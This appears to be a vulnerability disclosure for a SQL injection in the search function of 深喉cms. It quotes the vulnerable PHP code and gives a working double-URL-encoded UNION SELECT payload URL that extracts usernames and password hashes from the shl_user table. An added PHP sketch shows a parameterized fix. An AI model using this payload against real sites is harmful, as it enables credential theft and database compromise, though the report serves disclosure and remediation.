Brief description:
A SQL injection vulnerability in 深喉cms, caused by insufficiently strict handling of input data.
Detailed description:
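    // Excerpt from the search handler.
    global $db, $request;
    // urldecode() is applied to the request value here, so a double-encoded
    // quote (%2527) ends up as a literal ' in $keyword.
    $keyword = urldecode($request['keyword']);
    switch ($modelName)
    {
        case 'article':
            // $keyword is concatenated directly into the LIKE clauses.
            $sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc";
            return $db->get_results($sql);
            break;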
An injection, isn't it? Isn't it!!!
http://www.****.com/foo/?p=24;m=search;keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
Proof of vulnerability:
Fix:
Filter the input.
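
The following PHP sketch is an added example, not code from the CMS or from the original report: it shows why a urldecode() call placed after input escaping brings the quote back, and a parameterized form of the search query. The PDO/SQLite setup, the search_articles() name, the sample rows, and the assumption that request values are escaped upstream with addslashes() are constructed for illustration.

```php
<?php
// Added example: constructed schema and data, not the CMS's own code.
define('TB_PREFIX', 'shl_');

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ' . TB_PREFIX . 'article (id INTEGER PRIMARY KEY, pageName TEXT, content TEXT)');
$pdo->exec("INSERT INTO " . TB_PREFIX . "article (pageName, content) VALUES ('aaa', 'first'), ('it''s 100% done', 'second')");

// 1) Why escaping before urldecode() does not help (assumption: the request
//    layer escapes values once, e.g. with addslashes()).
$onceDecoded = 'aaa%27';                 // "aaa%2527" after the first URL decode
$escaped     = addslashes($onceDecoded); // nothing to escape: no quote present yet
$keyword     = urldecode($escaped);      // second decode creates the quote after escaping ran
var_dump($keyword === "aaa'");

// 2) Hardened search: no second decode, keyword bound as a parameter,
//    LIKE wildcards in user input escaped so they match literally.
function search_articles(PDO $pdo, string $keyword): array
{
    $like = '%' . addcslashes($keyword, '%_\\') . '%';
    $sql  = 'SELECT * FROM ' . TB_PREFIX . 'article'
          . " WHERE pageName LIKE :kw ESCAPE '\\' OR content LIKE :kw2 ESCAPE '\\'"
          . ' ORDER BY id DESC';
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':kw' => $like, ':kw2' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A quote or a percent sign is now just data to search for.
foreach (["aaa'", "it's", '100%', 'aaa'] as $kw) {
    printf("%-6s -> %d row(s)\n", $kw, count(search_articles($pdo, $kw)));
}
```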